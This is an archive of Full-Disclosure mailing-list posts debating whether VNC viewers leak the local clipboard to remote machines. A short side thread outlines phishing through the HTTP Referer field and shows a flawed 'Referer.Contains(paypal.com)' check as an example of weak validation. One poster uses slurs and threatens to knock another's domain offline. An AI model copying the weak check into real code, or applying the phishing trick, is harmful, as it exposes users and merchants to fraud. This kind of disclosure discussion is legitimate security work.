Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
have the clipboard disabled... On 01/25/2012 08:44 AM, Peter Osterberg wrote: I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
On 25.01.2012 5:45, Ben Bucksch wrote: On 25.01.2012 00:52, Henri Salo wrote: On Wed, Jan 25, 2012 at 12:47:28AM +0100, Ben Bucksch wrote: On 25.01.2012 00:09, Dan Kaminsky wrote: IP KVM, in which the foreign server basically gets only inbound Keyboard and Mouse and outbound uncompressed pixels. That is *precisely* what VNC is: an open-source IP KVM. What the hell? Seriously.. http://en.wikipedia.org/wiki/VNC hihi. Thanks. It transmits the keyboard and mouse events from one computer to another, relaying the graphical screen updates back in the other direction, over a network. The VNC protocol (RFB) is very simple, based on one graphic primitive from server to client ('Put a rectangle of pixel data at the specified X,Y position') and event messages from client to server. Compare to above. Now, the part where it defines that clipboard is also a standard part of VNC... oh, huch, it's not there! (Just a random note that Unicode is impossible, but not that clipboard is defined as part of the protocol at all.) Ah, I know... Surely, it must be on http://en.wikipedia.org/wiki/RFB_protocol... No, same thing there. Strange. It should be strictly understood that something not being mentioned in the Wikipedia article doesn't mean that doesn't exist at all, since Wikipedia is _not_ authoritative information source. The authoritative information source would be the formal specification of the protocol explicitly defining the set of event types and explicitly prohibiting non-defined event types, otherwise implementations are free to define and use their own event types being in fact extensions of the protocol. It's defined nowhere that VNC is _exactly_ open-source IP KVM and nothing more. P.S. I was just reporting bug. I hope at least some software finds a better solution. Have fun. I'd suggest you find alternative product allowing you to explicitly configure that clipboard is not transmitted to the host under control instead of struggling with the product limitations and design flaws. -- Sincerely Yours, Dan. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
you are seriously more retarded than even the n3td3v+me+you together...damn army..! On 25 January 2012 19:29, Peter Osterberg j...@vel.nu wrote: Wasn't the original thread originally about VNC? On 01/25/2012 09:27 AM, GloW - XD wrote: derp, do you know what KVM IP is ? readup on how that relays ;) thats that. XD On 25 January 2012 18:44, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
nice to send THIS one to fd, and you ssomehow admit to knowing it here yet, i told you what it was, exactly, dont try make me look bad fag, or i will drop your fucking domain, for a month :) ciao beech,. xd On 25 January 2012 19:55, Dan Yefimov d...@lightwave.net.ru wrote: On 25.01.2012 5:45, Ben Bucksch wrote: On 25.01.2012 00:52, Henri Salo wrote: On Wed, Jan 25, 2012 at 12:47:28AM +0100, Ben Bucksch wrote: On 25.01.2012 00:09, Dan Kaminsky wrote: IP KVM, in which the foreign server basically gets only inbound Keyboard and Mouse and outbound uncompressed pixels. That is *precisely* what VNC is: an open-source IP KVM. What the hell? Seriously.. http://en.wikipedia.org/wiki/VNC hihi. Thanks. It transmits the keyboard and mouse events from one computer to another, relaying the graphical screen updates back in the other direction, over a network. The VNC protocol (RFB) is very simple, based on one graphic primitive from server to client ('Put a rectangle of pixel data at the specified X,Y position') and event messages from client to server. Compare to above. Now, the part where it defines that clipboard is also a standard part of VNC... oh, huch, it's not there! (Just a random note that Unicode is impossible, but not that clipboard is defined as part of the protocol at all.) Ah, I know... Surely, it must be on http://en.wikipedia.org/wiki/RFB_protocol... No, same thing there. Strange. It should be strictly understood that something not being mentioned in the Wikipedia article doesn't mean that doesn't exist at all, since Wikipedia is _not_ authoritative information source. The authoritative information source would be the formal specification of the protocol explicitly defining the set of event types and explicitly prohibiting non-defined event types, otherwise implementations are free to define and use their own event types being in fact extensions of the protocol. It's defined nowhere that VNC is _exactly_ open-source IP KVM and nothing more. P.S. I was just reporting bug. I hope at least some software finds a better solution. Have fun. I'd suggest you find alternative product allowing you to explicitly configure that clipboard is not transmitted to the host under control instead of struggling with the product limitations and design flaws. -- Sincerely Yours, Dan. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
ooops my bad, wriong guy, or, you dont understand this either ? On 25 January 2012 19:55, Dan Yefimov d...@lightwave.net.ru wrote: On 25.01.2012 5:45, Ben Bucksch wrote: On 25.01.2012 00:52, Henri Salo wrote: On Wed, Jan 25, 2012 at 12:47:28AM +0100, Ben Bucksch wrote: On 25.01.2012 00:09, Dan Kaminsky wrote: IP KVM, in which the foreign server basically gets only inbound Keyboard and Mouse and outbound uncompressed pixels. That is *precisely* what VNC is: an open-source IP KVM. What the hell? Seriously.. http://en.wikipedia.org/wiki/VNC hihi. Thanks. It transmits the keyboard and mouse events from one computer to another, relaying the graphical screen updates back in the other direction, over a network. The VNC protocol (RFB) is very simple, based on one graphic primitive from server to client ('Put a rectangle of pixel data at the specified X,Y position') and event messages from client to server. Compare to above. Now, the part where it defines that clipboard is also a standard part of VNC... oh, huch, it's not there! (Just a random note that Unicode is impossible, but not that clipboard is defined as part of the protocol at all.) Ah, I know... Surely, it must be on http://en.wikipedia.org/wiki/RFB_protocol... No, same thing there. Strange. It should be strictly understood that something not being mentioned in the Wikipedia article doesn't mean that doesn't exist at all, since Wikipedia is _not_ authoritative information source. The authoritative information source would be the formal specification of the protocol explicitly defining the set of event types and explicitly prohibiting non-defined event types, otherwise implementations are free to define and use their own event types being in fact extensions of the protocol. It's defined nowhere that VNC is _exactly_ open-source IP KVM and nothing more. P.S. I was just reporting bug. I hope at least some software finds a better solution. Have fun. I'd suggest you find alternative product allowing you to explicitly configure that clipboard is not transmitted to the host under control instead of struggling with the product limitations and design flaws. -- Sincerely Yours, Dan. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
I could never lower myself to your level so I guess you win On 01/25/2012 10:32 AM, GloW - XD wrote: you are seriously more retarded than even the n3td3v+me+you together...damn army..! On 25 January 2012 19:29, Peter Osterberg j...@vel.nu wrote: Wasn't the original thread originally about VNC? On 01/25/2012 09:27 AM, GloW - XD wrote: derp, do you know what KVM IP is ? readup on how that relays ;) thats that. XD On 25 January 2012 18:44, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
IP KVM, in which the foreign server basically gets only inbound Keyboard and Mouse and outbound uncompressed pixels. That is *precisely* what VNC is: an open-source IP KVM. No, it's not. I won't go into the differences because other people already did in this thread. And please don't turn this into you're stupid, because I've seen others with the same setup. As mentioned, I know of a government agency with highly competent IT staff who had a similar setup: normal and sensitive work is on the desktop/notebook and Internet access (which is considered insecure) is on a remote machine, with a viewer on the desktop. That proves nothing. For example, there are many SCADA devices owned by government agencies connected to the Internet, but that doesn't mean it's a good idea to do so. -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
Fair enough :) On Wed, Jan 25, 2012 at 10:59 AM, Peter Osterberg j...@vel.nu wrote: On 01/25/2012 10:54 AM, Mario Vilas wrote: The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. That may very well be true. I am not trying to debate that. -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Using HTTP referer for phishing attacks
This could be also used in some cases to Refer requests from paypal or such payment systems when there is no/bad validation checks on an e-commerce website. ie: if(Referer.Contains(paypal.com)) { ok } but what if i control mypaypal.com? Le 24/01/2012 20:14, Jan Wrobel a écrit : Hi, Sorry if this is not new, but I didn't manage to find any mention of such a technique. In short: HTTP referer field contains information where the web user is coming from, which is often a trusted site such as a web search. Having such information, a malicious web site can use several tricks to fool the user into thinking that he or she returned to the referring site. In fact, the user is taken to a generic phishing site that intercepts all data exchanged between the user, the referring site and sites visited from the referring site. More detailed write up with few examples is here: http://mixedbit.org/referer.html Cheers, Jan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Jerome Athias - NETpeas VP, Director of Software Engineer Palo Alto - Paris - Casablanca www.netpeas.com - Stay updated on Security: www.vulnerabilitydatabase.com The computer security is an art form. It's the ultimate martial art. smime.p7s Description: Signature cryptographique S/MIME ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
On 01/25/2012 10:54 AM, Mario Vilas wrote: The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. That may very well be true. I am not trying to debate that. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
That's not necessarily true. On windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris. On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Using HTTP referer for phishing attacks
hrm now thats indeed of interest... good to point out...thx. On 25 January 2012 21:09, Jerome Athias jer...@netpeas.com wrote: This could be also used in some cases to Refer requests from paypal or such payment systems when there is no/bad validation checks on an e-commerce website. ie: if(Referer.Contains(paypal.com)) { ok } but what if i control mypaypal.com? Le 24/01/2012 20:14, Jan Wrobel a écrit : Hi, Sorry if this is not new, but I didn't manage to find any mention of such a technique. In short: HTTP referer field contains information where the web user is coming from, which is often a trusted site such as a web search. Having such information, a malicious web site can use several tricks to fool the user into thinking that he or she returned to the referring site. In fact, the user is taken to a generic phishing site that intercepts all data exchanged between the user, the referring site and sites visited from the referring site. More detailed write up with few examples is here: http://mixedbit.org/referer.html Cheers, Jan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Jerome Athias - NETpeas VP, Director of Software Engineer Palo Alto - Paris - Casablanca www.netpeas.com - Stay updated on Security: www.vulnerabilitydatabase.com The computer security is an art form. It's the ultimate martial art. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
Windows is even more secure, have you actually, read any of the code / On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote: That's not necessarily true. On windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris. On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
INSECURE i mean* On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote: That's not necessarily true. On windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris. On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
No, I only read the manual. Now go troll somwhere else. :) On Wed, Jan 25, 2012 at 11:35 AM, GloW - XD doo...@gmail.com wrote: Windows is even more secure, have you actually, read any of the code / On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote: That's not necessarily true. On windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris. On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
On 25.01.2012 08:44, Peter Osterberg wrote: I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. Exactly. I take offense in that without the user knowing it part. I chose my reproduction specifically with a mouse action and not Ctrl-V so that the VNC viewer cannot know I tried to paste in notepad.exe and cannot have transmitted the information at that moment only. It means that Windows had the information all along, at the moment when I copied, which means the remote Windows reads all my copies on the local X11, not just when I paste in Windows. That and only that is the problem. Possible solution, concretely: Paste button on VNC viewer toolbar If the user presses the button, the viewer sends the clipboard to the remote machine at that moment, and then triggers a Ctrl-V keypress in the remove machine. If the user doesn't press the button, but focuses the VNC viewer and presses Ctrl-V, the viewer sends the clipboard to the remote machine and only then sends the Ctrl-V to the remote machine. In both cases, mouse or keyboard, you wouldn't need any more actions in practice. You still do Ctrl-C in your Linux app, switch to the viewer, press Ctrl-V there, and you got the text in notepad.exe. Of course that would be configurable so that you can change they key combo, e.g. for Macs, or to disable sending the key combo after the Paste button, or to disable the clipboard entirely. Dan Yefimov, the RFB specification from 2007 happens to be linked from the page I mentioned, and funny enough... copypaste / clipboard isn't mentioned with a single word either. Now, obviously, it is possible somehow, because it's working, so there is some way, but it was never part of the protocol. And it cannot be claimed that every user somehow naturally knows how exactly it works and he realizes what it implies concretely for his work. Ben ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
